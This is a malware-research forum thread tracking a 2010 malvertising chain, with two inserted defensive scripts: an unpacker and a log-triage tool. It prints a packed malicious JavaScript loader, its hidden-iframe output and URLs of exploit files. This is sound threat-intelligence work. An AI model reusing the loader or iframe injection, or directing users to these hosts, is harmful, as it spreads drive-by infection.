Malware Domain List

Malware Related => Malicious Domains => Topic started by: eoin.miller on May 11, 2010, 05:00:59 pm

Title: adnet.media.*.com domains - NEW TITLE
Post by: eoin.miller on May 11, 2010, 05:00:59 pm
Drive-by sites serving up FakeAV and exploiting clients through PDF and Java vulnerabilities.

VirusTotal is only picking up 7/41 on the FakeAV currently.
http://www.virustotal.com/analisis/01b398a0ffe71f4d284df532f7d6112c6d4ca40d8ade4d358ba772f1352fc8ff-1273594077

PDF:
http://relwqin.com/b/pdf/all.pdf

Java:
http://relwqin.com/b/java/gsb2.jar
http://relwqin.com/b/java/bof.jar

Driveby URL:
http://relwqin.com/b/index.php?m=jp
Title: Re: 194.8.250.60 - polkita.com, relwqin.com
Post by: eoin.miller on May 11, 2010, 05:06:19 pm
Entry points to drive-bys:

http://alenadi.com/cust.php?n=cust2
http://canteeve.com/cust.php?n=cust2

Almost all the people we have going to these sites are clicking on links from people going to Microsoft live.com mail accounts and other sites using malvertising services like those on live.com.
Title: Re: 194.8.250.60 - polkita.com, relwqin.com
Post by: eoin.miller on May 12, 2010, 02:06:29 pm
More today:

http://qwebork.com/a/index.php
http://lutypla.com/a/index.php
http://trynger.com/a/index.php

Looks like it is rotating domains daily (not surprising) and the IP is staying the same for now. Still getting linked to by legit sites that have done business with advertising services that, it appears, do not properly vet the organizations they choose to do business with.
Title: Re: 194.8.250.60 - polkita.com, relwqin.com
Post by: eoin.miller on May 12, 2010, 03:54:00 pm
New entry point:

aledat.com
Title: Re: 194.8.250.60 - polkita.com, relwqin.com
Post by: philipp on May 12, 2010, 04:13:20 pm
Code:
403 http://trynger.com/
200 http://trynger.com/b/
200 http://trynger.com/a/
200 http://trynger.com/e/
200 http://trynger.com/d/
200 http://trynger.com/c/
403 http://trynger.com/cgi-bin/
302 http://trynger.com/config/
200 http://trynger.com/b/index.php
200 http://trynger.com/b/install.php
403 http://trynger.com/b/d/
403 http://trynger.com/b/bin/
403 http://trynger.com/b/include/
403 http://trynger.com/b/java/
403 http://trynger.com/b/pdf/
200 http://trynger.com/b/d/0.php (MD5: eb2add15ac24545e28cbc87dac1a7e65)
200 http://trynger.com/b/d/1.php (MD5: eb2add15ac24545e28cbc87dac1a7e65)
200 http://trynger.com/b/d/2.php (MD5: eb2add15ac24545e28cbc87dac1a7e65)
200 http://trynger.com/b/d/3.php (MD5: eb2add15ac24545e28cbc87dac1a7e65)
200 http://trynger.com/b/d/4.php (MD5: eb2add15ac24545e28cbc87dac1a7e65)
200 http://trynger.com/b/d/5.php (MD5: eb2add15ac24545e28cbc87dac1a7e65)
200 http://trynger.com/b/bin/upload.php
200 http://trynger.com/b/include/config.php
200 http://trynger.com/b/java/bof.jar
200 http://trynger.com/b/java/gsb2.jar
200 http://trynger.com/b/pdf/all.pdf
200 http://trynger.com/b/pdf/pdf.php
200 http://trynger.com/a/index.php
200 http://trynger.com/a/install.php
403 http://trynger.com/a/d/
403 http://trynger.com/a/bin/
403 http://trynger.com/a/include/
403 http://trynger.com/a/java/
403 http://trynger.com/a/pdf/
200 http://trynger.com/a/d/0.php
200 http://trynger.com/a/d/1.php
200 http://trynger.com/a/d/2.php
200 http://trynger.com/a/d/3.php
200 http://trynger.com/a/d/4.php
200 http://trynger.com/a/d/5.php
200 http://trynger.com/a/bin/upload.php
200 http://trynger.com/a/include/config.php
200 http://trynger.com/a/java/bof.jar
200 http://trynger.com/a/java/gsb2.jar
200 http://trynger.com/a/pdf/all.pdf
200 http://trynger.com/a/pdf/pdf.php
200 http://trynger.com/e/index.php
200 http://trynger.com/e/install.php
403 http://trynger.com/e/d/
403 http://trynger.com/e/bin/
403 http://trynger.com/e/include/
403 http://trynger.com/e/java/
403 http://trynger.com/e/pdf/
200 http://trynger.com/e/d/0.php (MD5: d8fc0cbb07ab263198d7a5fbb0ee5c53)
200 http://trynger.com/e/d/1.php (MD5: d8fc0cbb07ab263198d7a5fbb0ee5c53)
200 http://trynger.com/e/d/2.php (MD5: d8fc0cbb07ab263198d7a5fbb0ee5c53)
200 http://trynger.com/e/d/4.php (MD5: d8fc0cbb07ab263198d7a5fbb0ee5c53)
200 http://trynger.com/e/d/5.php (MD5: d8fc0cbb07ab263198d7a5fbb0ee5c53)
200 http://trynger.com/e/d/3.php (MD5: d8fc0cbb07ab263198d7a5fbb0ee5c53)
200 http://trynger.com/e/bin/upload.php
200 http://trynger.com/e/include/config.php
200 http://trynger.com/e/java/bof.jar
200 http://trynger.com/e/java/gsb2.jar
200 http://trynger.com/e/pdf/all.pdf
200 http://trynger.com/e/pdf/pdf.php
200 http://trynger.com/d/index.php
200 http://trynger.com/d/install.php
403 http://trynger.com/d/d/
403 http://trynger.com/d/bin/
403 http://trynger.com/d/include/
403 http://trynger.com/d/java/
403 http://trynger.com/d/pdf/
200 http://trynger.com/d/d/0.php
200 http://trynger.com/d/d/1.php
200 http://trynger.com/d/d/2.php
200 http://trynger.com/d/d/4.php
200 http://trynger.com/d/d/5.php
200 http://trynger.com/d/d/3.php
200 http://trynger.com/d/bin/upload.php
200 http://trynger.com/d/include/config.php
200 http://trynger.com/d/java/bof.jar
200 http://trynger.com/d/java/gsb2.jar
200 http://trynger.com/d/pdf/all.pdf
200 http://trynger.com/d/pdf/pdf.php
200 http://trynger.com/c/index.php
200 http://trynger.com/c/install.php
403 http://trynger.com/c/d/
403 http://trynger.com/c/bin/
403 http://trynger.com/c/include/
403 http://trynger.com/c/java/
403 http://trynger.com/c/pdf/
200 http://trynger.com/c/d/0.php
200 http://trynger.com/c/d/1.php
200 http://trynger.com/c/d/3.php
200 http://trynger.com/c/d/2.php
200 http://trynger.com/c/d/4.php
200 http://trynger.com/c/d/5.php
200 http://trynger.com/c/bin/upload.php
200 http://trynger.com/c/include/config.php
200 http://trynger.com/c/java/bof.jar
200 http://trynger.com/c/java/gsb2.jar
200 http://trynger.com/c/pdf/all.pdf
200 http://trynger.com/c/pdf/pdf.php
Code:
200 http://aledat.com/
200 http://aledat.com/cust.php
200 http://aledat.com/index.php
200 http://aledat.com/phpinfo.php
403 http://aledat.com/b/
403 http://aledat.com/w/
403 http://aledat.com/ad/
403 http://aledat.com/cgi-bin/
403 http://aledat.com/ad/js/

edit: forgot the other one :D
Title: Re: 194.8.250.60 - polkita.com, relwqin.com
Post by: eoin.miller on May 12, 2010, 06:02:26 pm
Found the advertising server that is redirecting to the intermediary and eventually the exploit sites:

adnet.media.roxantb.com

That domain was registered last month and serves up packed/obfuscated JavaScript:

Code:
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('5 3M={5f:q(m,e,n){m=12.3F(m);5 R=[],M=\'\';x(5 i=0;i<m.j;i+=3){5 11=\'1\';x(5 h=0;h<3;h++){v(i+h<m.j){N=8.o(m.f(i+h))-30;v(N.j<2)N=\'0\'+N}3K 5a;11+=N}R.2t(11+\'1\')}x(5 k=0;k<R.j;k++){5 P=8.13(R[k],e,n);5 L=P.X(16);V(L.j<7)L=\'0\'+L;M+=L}M=M.3R(3P 3O(\'^+|+$\',\'g\'),\'\');b 8.2r(M)},3N:q(c,d,n){c=8.2p(c);5 G=[],U=\'\',18=\'\';x(5 i=0;i<c.j;i+=7)G.2t(c.Y(i,7));x(5 u=0;u<G.j;u++)v(G[u]==\'\')G.5b(u,1);x(5 u=0;u<G.j;u++){5 P=8.13(Z(G[u],16),d,n)+\'\';U+=P.Y(1,P.j-2)}x(5 u=0;u<U.j;u+=2)18+=8.a(Z(U.Y(u,2),10)+30);b 12.3Q(18)},o:q(a){b t.o(a)},a:q(2u){b t.a(2u)},17:q(g,l){b g-(l*58.59(g/l))},13:q(2s,14,19){5 W=1,i=0,O=2s;V((14>>i)>0){v(((14>>i)&1)==1)W=8.17((W*O),19);O=8.17((O*O),19);i++}b W},2r:q(B){b B;5 J=\'\';x(5 i=0,Q=B.j;i<Q;i+=2){5 I=Z(\'\'+B.f(i)+B.f(i+1),16).X(10);J+=t.a(I)}b J},2p:q(B){b B;5 J=\'\';x(5 i=0,Q=B.j;i<Q;i++){5 I=t.o(B.f(i)).X(16);J+=I.j==2?I:\'0\'+I}b J}};5 t={F:{3J:{2v:2q,2B:2w,2z:2A,2y:2x,2n:2o,2e:2d,2b:2c,2a:29,2g:2f,2m:2l,2j:2k,2i:2h,2D:2C,2Y:2X,28:2W,2U:2T,31:2Z,35:36,32:34,2S:33,2I:2R,2H:2J,2E:2G,2K:2F,2Q:2L,2O:2P,2N:2M,1M:37,1r:1p,1t:1u,1q:1x,1w:1v,1C:1B,1z:1A,1y:1o,1m:1D,1f:1d,1a:1c,1e:1b,1l:1n,1k:1g,1h:1j,1s:1i,1Y:27,1X:1Z,1U:1W,20:1V,26:21,24:25,1E:22,1T:23,1J:1S,1I:1K,1F:1H,1L:1G,1Q:1R,1N:1P,2V:1O,4v:3c,38:4r,4u:4t,4p:4s,4w:4q,4A:4B,4y:4z,4n:4o,4e:4d,4b:4c,4a:49,4g:4f,4m:4l,4D:4k,4h:4j,4C:4i,4Y:4H,4X:4Z,4U:4W,51:4V,52:55,53:56,50:54,4I:4S,4T:4J,4E:4G,4K:4F,4Q:4L,4P:4R,4M:4O,4x:4N,3t:47,3s:3u,3p:3r,3v:3q,3B:3w,3z:3A,3y:3x,3n:3o,3e:3d,3b:48,3a:39,3g:3f,3m:3l,3j:3k,3i:3h,3D:3C,3Z:3Y,3W:3X,3V:3U,41:40,45:46,42:44,3T:43,3I:3S},3H:{2q:2v,2w:2B,2A:2z,2x:2y,2o:2n,2d:2e,2c:2b,29:2a,2f:2g,2l:2m,2k:2j,2h:2i,2C:2D,2X:2Y,2W:28,2T:2U,2Z:31,36:35,34:32,33:2S,2R:2I,2J:2H,2G:2E,2F:2K,2L:2Q,2P:2O,2M:2N,37:1M,1p:1r,1u:1t,1x:1q,1v:1w,1B:1C,1A:1z,1o:1y,1D:1m,1d:1f,1c:1a,1b:1e,1n:1l,1g:1k,1j:1h,1i:1s,27:1Y,1Z:1X,1W:1U,1V:20,21:26,25:24,22:1E,23:1T,1S:1J,1K:1I,1H:1F,1G:1L,1R:1Q,1P:1N,1O:2V,3c:4v,4r:38,4t:4u,4s:4p,4q:4w,4B:4A,4z:4y,4o:4n,4d:4e,4c:4b,49:4a,4f:4g,4l:4m,4k:4D,4j:4h,4i:4C,4H:4Y,4Z:4X,4W:4U,4V:51,55:52,56:53,54:50,4S:4I,4J:4T,4G:4E,4F:4K,4L:4Q,4R:4P,4O:4M,4N:4x,47:3t,3u:3s,3r:3p,3q:3v,3w:3B,3A:3z,3x:3y,3o:3n,3d:3e,48:3b,39:3a,3f:3g,3l:3m,3k:3j,3h:3i,3C:3D,3Y:3Z,3X:3W,3U:3V,40:41,46:45,44:42,43:3T,3S:3I}},o:q(a,r){r=r||\'3J\';v(!8.F[r])b 3G;a=a.5g(0);b(a 3E 8.F[r])?8.F[r][a]:a},a:q(o,r){r=r||\'3H\';v(!8.F[r])b 3G;o=(o 3E 8.F[r])?8.F[r][o]:o;b 5m.5h(o)}};5 12={w:"5l+/=",3F:q(p){5 s=\'\',H,C,D,K,E,z,y,i=0;V(i<p.j){H=t.o(p.f(i++));C=t.o(p.f(i++));D=t.o(p.f(i++));K=H>>2;E=((H&3)<<4)|(C>>4);z=((C&15)<<2)|(D>>6);y=D&5i;v(3L(C))z=y=S;3K v(3L(D))y=S;s=s+8.w.f(K)+8.w.f(E)+8.w.f(z)+8.w.f(y)}b s},3Q:q(p){5 s=\'\',H,C,D,K,E,z,y,i=0;p=p.3R(3P 3O(\'[^A-5j-5e-9+/=]\',\'g\'),\'\');V(i<p.j){K=8.w.T(p.f(i++));E=8.w.T(p.f(i++));z=8.w.T(p.f(i++));y=8.w.T(p.f(i++));H=(K<<2)|(E>>4);C=((E&15)<<4)|(z>>2);D=((z&3)<<6)|y;s=s+t.a(H);v(z!=S)s=s+t.a(C);v(y!=S)s=s+t.a(D)}b s}};5d(3M.3N(\'57\',\'5c\',\'5k\'));',62,333,'|||||var|||this||chr|return||||charAt||||length|||||ord|input|function|dir|output|ASCII||if|alphabet|for|enc4|enc3||str|chr2|chr3|enc2|translations|decryptarray|chr1|bte|result|enc1|chunk|coded|tmpstr|basepow2|resultmod|len|asci|64|indexOf|deencrypt|while|accum|toString|substr|parseInt||tmpasci|BASE64|powmod|exp|||mod|resultd|modulus|1028|175|170|168|1031|1025|179|1169|184|180|1110|1030|1168|178|163|156|1115|1114|1105|1116|157|159|1119|158|1032|1118|162|161|1038|165|1040|1044|197|196|1043|1042|195|1045|8250|1047|200|199|1046|198|194|1041|1112|189|188|1108|8470|186|1029|190|192|193|1111|191|1109|185|1035|135|8225|8224|134|133|8230|136|8364|139|8249|1033|138|137|8240|8222|132|strhex|128|hexstr|base|push|num|1026|129|131|1107|8218|130|1027|140|1034|8211|151|150|8226|8221|149|8212|152|154|1113|8482|153|65533|148|8220|143|1039|1048|142|141|1036|144||1106|8217|147|146|8216|145|155|1050|242|1090|1089|201|240|1088|243|1091|246|1094|1093|245|244|1092|1087|239|1082|235|234|1081|1080|233|1083|236|238|1086|1085|237|1084|247|1095|in|encode|null|php2js|1103|js2php|else|isNaN|RSA|decrypt|RegExp|new|decode|replace|255|1102|250|1098|1097|249|248|1096|251|1099|1101|254|253|1100|252|232|241|211|1059|1058|210|209|1057|212|1060|1063|216|215|214|213|1061|1056|208|1052|205|202|204|203|1051|1049|1053|1079|1055|207|1054|206|1064|1062|1074|227|226|217|1072|225|1075|228|1078|231|230|1077|1076|229|224|1073|1067|220|219|1066|1065|218|1071|1068|1069|1070|223|221|222|1e0207526271ff2eedf4423bec450e06a6f1f528ac28ea9c4050c2d003cbab303400fe28ea9c4050c2d003cbab303400fe2dae2430da709233f18d90dfbafc242d8ab1ce7d6e385b92c28d9dcc260d92b2f9c03c18bc4a128d9dcc260d92b0964bf818bc4a1167111c271c61c2dbd91d03809de2e0b7cd39764932dbd91d03809de2e0b7cd39764932dbd91d03809de2e0b7cd353c74638daa560bbc7450439e830637fdc07a4226081064f1a81a3a041041025346a428663c1125e31404104102b7f48428663c106d7b240d03df82daa6a33958fb72e063be15334d81a5f1ca38ad0051dc1d2515d364525644f5320b3f2125e31410161ec050c2d003cbab303400fe28ea9c4050c2d003cbab303400fe2dae2430da709233f18d90dfbafc242d8ab1ce7d6e385b92c28d9dcc260d92b2f9c03c18bc4a128d9dcc260d92b0964bf818bc4a1362a6bc19de87c1678dc41a844d71e9390b0cec8741fb659b08f567703cd1f415334d80c8047520b93d527e6ea61936fa60ae650f0730a9f167111c31fa20d0592c0220f6b3030dfff80edc77008c468b3208b7106d8142234f47406d6e04034948b2da7f6024f82a038588d62dc5030115424a0532e9d23bfc961757fb00b29df70a160b62ee078d247a6730b29df731d765039c4d912b4ec5b11b9dc623ef17438588d60297027241f38f10ab52527898691655b231eb65f715461bd29b668622be1d2074ae1011412280f73d7d2b49a3a11070d52dbe78c05a3ac43233df42f9a9ff07547a5148f29700897fa3032d8c274e65a3977c7304140921d15cde165a317285260f30eac2618af9ed2b5b76738db07f216ab7a13836572d9e39f00e4ce81ff08df043c95a2f1021805cb82e0dd8ba3381c41313c32cf1c1cbbe15ca10c0be411b0faec0009c222e08d6bf30c8d81a233f12724e8ae21128b9d14a49f815461bd30849002c04c3f036c44b193f8d01542b392c6bb5c021099f1c8a3fe0a480c70b2189106ff0b11c9ab7f173b8bb26700e401d1f9e171b134087cabc22a9b812854a9535c7dc72f9f68425e0d392e8f91b3836d0f21d915a067e04e1057eea073afcf10810671ca2ccd2dbe8560dcf5f617804470b679950fa04fa28d0bd3296c29930746f535a751111ce64728001ce1d7ac4a283623e0522faa39d77db058275b16aa6ed34e43590c1b15a2119788193c20a274e65a3977c7304140921d15cde165a317285260f30eac2618af9ed2b5b76738db07f216ab7a13836572d9e39f00e4ce81ff08df043c95a2f1021805cb82e0dd8ba3381c41313c32cf2dbf1501bb943b316f25238e312b0dd21811a037b5399384d3294b8a36da9b62cb6fc1392303d0cda4430a605f00e5e84322e4e23316b13012d4bfa0f22aac013e4d91a0efac25b58782c4047801d16b5121ce8a30660b71263fe915b9df1009dca82badb6924531452dcbe66145c41d07c1b28043431e382c01a2b416f42ff2347187b04a1d56b4333a22b53893393269aa271dd73b20d457861ebef29262c1330b80af7003f04d184586c0e4931d03400fe2e46aaf20aa7542a03011171ac1e35fd8b32ff23471b9dad832f6d501286e8e352dc9f0da8e94318d7b00cc6a6805a4a8918869d90c4c46c16bcaaf2f14b3e29d353420063ff1dddce30c50ff82654d24316da3000a3eac105373a208e740122df942e088031195c680175b9d27593bf2a67f1831ff59d26a48d107f41ac0b052c519f0aae1d81ab519085a705426ca1857780362f28322268012dc7c7919c0f7029460321cf70b71d5dbd7355d91929460322706ca73835f5618eb1962545dfe2fa283c372e3fb1610872174eef327148c315ad7120ce58701b9dad832f6d500995ef901f626d2939e0e082f1b1267704e15710252713bc524d2dd614593b414fbe990bb34a6015f07d0fffcec1b1a148215b373298545e0206bc820bf59c31ef6ca37b300814349323795d8c336fcd11f2dcd328d0bd314d2eb03813ce001e0cd01be68b90e3af110b2d8cd316da30021427b37bc5351d7ac4a0dde4c303e297435999cf34cfa0e0b10ba4346d54f0da70920ea16690ca99ae086c7401e2c8990abb2f10952f3f0006bb0160c00c1ac67b42010e990b0879726b75a6385db6921dc6122ae56512719841386ebf2109caaa2eedf4435d99f109440781fc1e7237a1ecc08176460661abe011bcc01d7561f1c27b2438971a338b9e162c37b1800df36c07260ed03c38dc25b15a41ff09700fbebfb2f952c31f92b83184062b084071f244f8a81ab739a26cc15c0342f2a111200009c9b5801f626d2939e0e082f1b1267704e18ca28f|Math|floor|break|splice|3451759|eval|z0|encrypt|charCodeAt|fromCharCode|63|Za|60670333|ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789|String'.split('|'),0,{}))
Deobfuscated:
Code:
<iframe src="http://aledat.com/cust.php?n=cust2" style="visibility: hidden;" height="1" width="1"></iframe>
<iframe class=" izvpldobgmpcxynswtnf" src="http://adnet.media.roxantb.com/stats_js_e.php?id=22214735" style="visibility: hidden;" height="1" width="1"></iframe>
<a href="http://curves.com/?=34547" target="_blank">
<img class=" izvpldobgmpcxynswtnf" src="http://adnet.media.roxantb.com/banners/load.php?id=22214735" border="0"></a>

In this instance, the aledat.com/cust.php?n=cust2 request redirects to another site that actually has the drive-by kit on it.
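The script quoted above is wrapped in the common "p,a,c,k,e,d" packer: the wrapper's last argument is a '|'-separated dictionary, and every word token in the payload is a base-62 index into it. The following is an added example, not code from the thread or from the actors behind it: a static unpacker that performs the same substitution the wrapper does at run time, so the first stage can be read without calling eval(). The packed input it runs on (SAMPLE_PACKED) is a constructed toy, not the roxantb.com payload. Note that, in the real sample, the dictionary visibly contains RSA, decrypt, powmod, BASE64 and eval, so the first stage this recovers is itself a second decoder and needs another pass.

```javascript
// Added example (not code from the thread): a static unpacker for the Dean Edwards
// "p,a,c,k,e,d" wrapper seen in the adnet.media.roxantb.com script.
// SAMPLE_PACKED below is a constructed toy, not the real payload.

// Encode index c in base a exactly as the wrapper's e() does: digits 0-9, then
// a-z, then A-Z (String.fromCharCode(c + 29) yields 'A'..'Z' for 36..61).
function encodeIndex(c, a) {
  const high = c < a ? '' : encodeIndex(Math.floor(c / a), a);
  const low = c % a;
  return high + (low > 35 ? String.fromCharCode(low + 29) : low.toString(36));
}

// Undo the single-quoted JavaScript string escapes used in the wrapper's
// arguments (\\ -> \, \' -> ', plus the usual control escapes). Unknown
// escapes are left untouched.
function unescapeSingleQuoted(s) {
  const map = { n: '\n', r: '\r', t: '\t', "'": "'", '"': '"', '\\': '\\', '/': '/' };
  return s.replace(/\\(.)/g, (m, ch) =>
    Object.prototype.hasOwnProperty.call(map, ch) ? map[ch] : m);
}

// Pull (p, a, c, k) out of
//   eval(function(p,a,c,k,e,d){...}('p', a, c, 'k'.split('|'), 0, {}))
function parsePackedWrapper(src) {
  const re = /\}\('((?:\\.|[^'\\])*)'\s*,\s*(\d+)\s*,\s*(\d+)\s*,\s*'((?:\\.|[^'\\])*)'\.split\('\|'\)/;
  const m = re.exec(src);
  if (!m) throw new Error('not a recognised p,a,c,k,e,d wrapper');
  return {
    payload: unescapeSingleQuoted(m[1]),
    base: Number(m[2]),
    count: Number(m[3]),
    words: unescapeSingleQuoted(m[4]).split('|'),
  };
}

// The substitution the wrapper performs at run time: every \w+ token in the
// payload that encodes an index i stands for words[i]; an empty dictionary
// entry means the token is its own word (e.g. the literal 0 in i=0), exactly
// as the wrapper's  d[e(c)] = k[c] || e(c)  does.
function unpack({ payload, base, count, words }) {
  // No prototype, so a token such as 'constructor' can never hit Object.prototype.
  const dict = Object.create(null);
  for (let i = 0; i < count; i++) {
    const token = encodeIndex(i, base);
    dict[token] = words[i] || token;
  }
  return payload.replace(/\b\w+\b/g, (w) => (w in dict ? dict[w] : w));
}

function unpackSource(src) {
  return unpack(parsePackedWrapper(src));
}

// Constructed sample: three dictionary words, base 62 (assumption: toy input).
const SAMPLE_PACKED =
  "eval(function(p,a,c,k,e,d){/* wrapper body elided */}" +
  "('0(\\'1\\');2.write(\\'1\\')',62,3,'alert|hello|document'.split('|'),0,{}))";

console.log(unpackSource(SAMPLE_PACKED)); // alert('hello');document.write('hello')
```

To use it on a captured sample, read the script body from the saved response and pass it to unpackSource(); if the result still starts with another eval(...) call, as the dictionary of the real sample suggests, treat the output as stage two and decode that separately (in a sandbox, since the inner stage is arithmetic over a modulus the script carries with it).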
Title: Re: 194.8.250.60 - polkita.com, relwqin.com
Post by: SysAdMini on May 12, 2010, 06:06:57 pm
What exactly is the URL of the obfuscated code?
Title: Re: 194.8.250.60 - polkita.com, relwqin.com
Post by: eoin.miller on May 12, 2010, 06:23:01 pm
There is also another domain name on this IP; I should be able to churn up some more domains now.

adnet.media.plebert.com

Title: Re: 194.8.250.60 - polkita.com, relwqin.com
Post by: eoin.miller on May 12, 2010, 06:29:13 pm
Quote
What exactly is the URL of the obfuscated code?

here is an example one:

http://adnet.media.roxantb.com/bn/j/cd/?rq=104192&sid=22214735&m=514&tn=7&d=s&ct=1&t=s
Title: Re: adnet.media.*.com domains - NEW TITLE
Post by: eoin.miller on May 12, 2010, 07:07:53 pm
Malvertising hostnames:
adnet.media.roxantb.com
adnet.media.plebert.com
adnet.media.ditent.com
adnet.media.modicea.com

IP addresses:
188.72.192.52
188.72.192.67
188.72.192.221
Title: Re: adnet.media.*.com domains - NEW TITLE
Post by: eoin.miller on May 12, 2010, 08:03:36 pm
Sooooo, yea, there are tons of badness going on in here. Basically, all traffic to the 188.72.192.0/24 should be considered suspect.

Hostnames within the 188.72.192.0/24 we have seen traffic to/from in the last month or so:
ad.doubleclick.net.spellet.com
adfarm.mediaplex.com.rulash.com
adnet.media.ditent.com
adnet.media.modicea.com
adnet.media.plebert.com
adnet.media.roxantb.com
aledat.com
alenadi.com
canteeve.com
media.fastclick.net.attesca.com
mediastatsfx.com
sefito.com
stathyte.com
view.atdmt.com.dilann.com
view.atdmt.com.intati.com
www.downloads.ws - Probably not a malware site...

Looks like they enjoy keeping the real domain names of advertising servers as a prefix to their own.
Title: Re: 194.8.250.60 - polkita.com, relwqin.com
Post by: Kimberly on May 13, 2010, 02:50:51 am
Quote
Almost all the people we have going to these sites are clicking on links from people going to Microsoft live.com mail accounts and other sites using malvertising services like those on live.com.
Hi, do you have more information about that? Does it happen on blogs, Hotmail...? If it comes through MS advertising I can get those pulled, but I need more information on where the redirects occur, if possible.

Quote
Looks like they enjoy keeping the real domain names of advertising servers as a prefix to their own.
Yes, that's going on for a while already.
Title: Re: 194.8.250.60 - polkita.com, relwqin.com
Post by: eoin.miller on May 13, 2010, 04:10:54 pm
Quote
Almost all the people we have going to these sites are clicking on links from people going to Microsoft live.com mail accounts and other sites using malvertising services like those on live.com.
Quote
Hi, do you have more information about that? Does it happen on blogs, Hotmail...? If it comes through MS advertising I can get those pulled, but I need more information on where the redirects occur, if possible.

Most of the time it is when people log in to the live.com mail account; the banner ad has the packed/obfuscated JavaScript that is served up by one of the following domains:

ad.doubleclick.net.spellet.com
adfarm.mediaplex.com.rulash.com
adnet.media.ditent.com
adnet.media.modicea.com
adnet.media.plebert.com
adnet.media.roxantb.com
media.fastclick.net.attesca.com
view.atdmt.com.dilann.com
view.atdmt.com.intati.com

Then that JavaScript from the above list of sites includes an iframe that loads content from the following domains:
aledat.com/?cust=2
alenadi.com/?cust=2
canteeve.com/?cust=2
sefito.com/?cust=2
stathyte.com/?cust=2

Then the content loaded from those sites causes the actual drive-bys to be loaded from the following sites, which all resolve to 194.8.250.60/194.8.250.61:

polkita.com
www.lutypla.com
zarenaga.com
turkinke.com
relwqin.com
trynger.com
qwebork.com

Quote
Looks like they enjoy keeping the real domain names of advertising servers as a prefix to their own.
Yes, that's going on for a while already.
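The posts above give two indicators a proxy log can be checked against: lookalike hostnames that put a real ad server's full name in front of an unrelated registrable domain (ad.doubleclick.net.spellet.com, view.atdmt.com.intati.com), and the netblocks the chain lands in (188.72.192.0/24 for the malvertising servers, 194.8.250.0/24 for the drive-by hosts). The following is an added example, not code from the thread: a small triage script that applies both checks to log lines. The log format, the sample lines and the two-label registrable-domain rule are constructed assumptions; only the hostnames, peer IPs and netblocks come from the posts.

```javascript
// Added example (not from the thread): triage proxy-log lines for the two
// indicators described in the posts. Log format and sample lines are constructed.

const GENUINE_AD_HOSTS = ['ad.doubleclick.net', 'adfarm.mediaplex.com',
  'media.fastclick.net', 'view.atdmt.com'];
const SUSPECT_NETBLOCKS = ['188.72.192.0/24', '194.8.250.0/24'];

// Assumption: the last two labels are the registrable domain. Real deployments
// should consult the Public Suffix List so that e.g. foo.co.uk is handled.
function registrableDomain(host) {
  return host.toLowerCase().split('.').slice(-2).join('.');
}

// Returns the genuine ad host a name impersonates, or null. The genuine host
// itself (ad.doubleclick.net) does not start with 'ad.doubleclick.net.' so it is
// never flagged; only names that extend it into a different registrable domain are.
function impersonatedAdHost(host) {
  const h = host.toLowerCase();
  for (const real of GENUINE_AD_HOSTS) {
    if (h.startsWith(real + '.') && registrableDomain(h) !== registrableDomain(real)) return real;
  }
  return null;
}

function ipv4ToInt(ip) {
  // >>> 0 after each step keeps the accumulator unsigned despite 32-bit shifts.
  return ip.split('.').reduce((acc, octet) => ((acc << 8) | Number(octet)) >>> 0, 0);
}

function ipInNetblock(ip, cidr) {
  const [net, prefix] = cidr.split('/');
  const bits = Number(prefix);
  const mask = bits === 0 ? 0 : (0xffffffff << (32 - bits)) >>> 0;
  return ((ipv4ToInt(ip) & mask) >>> 0) === ((ipv4ToInt(net) & mask) >>> 0);
}

// Constructed log format: epoch client-ip status method url peer-ip content-type
function parseLogLine(line) {
  const f = line.trim().split(/\s+/);
  if (f.length < 7) return null;
  let host;
  try { host = new URL(f[4]).hostname; } catch (e) { return null; }
  return { client: f[1], url: f[4], host, peer: f[5], type: f[6] };
}

function triageLogLine(line) {
  const rec = parseLogLine(line);
  if (!rec) return null;
  const reasons = [];
  const real = impersonatedAdHost(rec.host);
  if (real) reasons.push(`host impersonates ${real}`);
  for (const block of SUSPECT_NETBLOCKS) {
    if (ipInNetblock(rec.peer, block)) reasons.push(`peer ${rec.peer} in ${block}`);
  }
  return reasons.length ? { ...rec, reasons } : null;
}

function triage(lines) {
  return lines.map(triageLogLine).filter(Boolean);
}

// Constructed sample lines; peers 203.0.113.5 and 198.51.100.7 are documentation
// addresses standing in for benign servers.
const SAMPLE_LOG = [
  '1273686000.101 192.0.2.10 200 GET http://ad.doubleclick.net.spellet.com/bn/j/cd/?rq=104192 188.72.192.67 application/x-javascript',
  '1273686000.102 192.0.2.10 200 GET http://ad.doubleclick.net/adj/example 203.0.113.5 application/x-javascript',
  '1273686000.103 192.0.2.11 200 GET http://relwqin.com/b/pdf/all.pdf 194.8.250.60 application/pdf',
  '1273686000.104 192.0.2.12 200 GET http://www.example.com/ 198.51.100.7 text/html',
  '1273686000.105 192.0.2.12 200 GET http://view.atdmt.com.intati.com/stats_js_e.php 188.72.192.221 application/x-javascript',
];

console.log(JSON.stringify(triage(SAMPLE_LOG), null, 2));
```

The host check is deliberately narrow: it only fires when a known ad server's complete name is a leading label sequence of a host whose registrable domain is different, which is the exact trick the thread describes, and it will not flag the genuine doubleclick.net or atdmt.com hosts that legitimate publishers load.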
Title: Re: adnet.media.*.com domains - NEW TITLE
Post by: eoin.miller on May 13, 2010, 04:59:00 pm
Forgot to add that anything within the 194.8.250.0/24 should also be considered suspect.

194.8.250.0/24 - Hosts the drive-bys, exploits and malware.
188.72.192.0/24 - Hosts the malicious advertising services redirecting to the drive-bys, exploits and malware.
Title: Re: adnet.media.*.com domains - NEW TITLE
Post by: eoin.miller on May 14, 2010, 02:41:06 pm
Domains we have seen using these advertising services. Primarily, the referrers have been mail.live.com servers, once users have logged in to check their mail.

Code:
ad.doubleclick.net
adnet.media.ditent.com
ad.yieldmanager.com
anet.tradedoubler.com
apps.detnews.com
b5.boards2go.com
beforeitsnews.com
blogs.citizen-times.com
blogs.desmoinesregister.com
bobshouseofvideogames.com
caloriecount.about.com
classifieds.gftribune.com
comics.com
courier-journal.weather.gannettonline.com
cvhs.adbureau.net
dailyfreeman.ca.kaango.com
dailylocal.com
dailysquee.com
data.tennessean.com
delcotimes.com
detnews.com
forums.televisionwithoutpity.com
googleads.g.doubleclick.net
hawaiipreps.honoluluadvertiser.com
hfboards.com
ihasahotdog.com
